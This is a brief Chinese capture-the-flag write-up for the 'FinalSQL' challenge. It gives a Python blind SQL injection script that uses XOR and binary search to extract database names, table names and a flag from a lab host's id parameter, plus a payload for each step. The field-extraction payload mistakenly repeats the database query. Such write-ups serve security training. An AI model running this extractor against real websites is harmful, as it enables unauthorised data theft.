FinalSQL

有id参数，长着就像盲注。

exp：

import requests


if __name__ == "__main__":
    string = ""
    for i in range(1, 256):
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            ch = chr(mid)
            sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
            url = f'http://a10fc172-5571-460a-9f76-93eb2e9486fd.node3.buuoj.cn/search.php?id={sql}'
            # print(url)
            response = requests.get(url)
            if response.text.find("NO! Not t") == -1:
                right = mid
            else:
                left = mid + 1
            mid = (left + right) // 2
        string += chr(mid)
        print(string)

爆库名

sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)

爆表名

sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1" % (i, mid)

爆字段

sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)

拿flag

            sql = "1^(ord(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%d,1))>%d)^1" % (i, mid)

然后发现爆错表了2333......

            sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)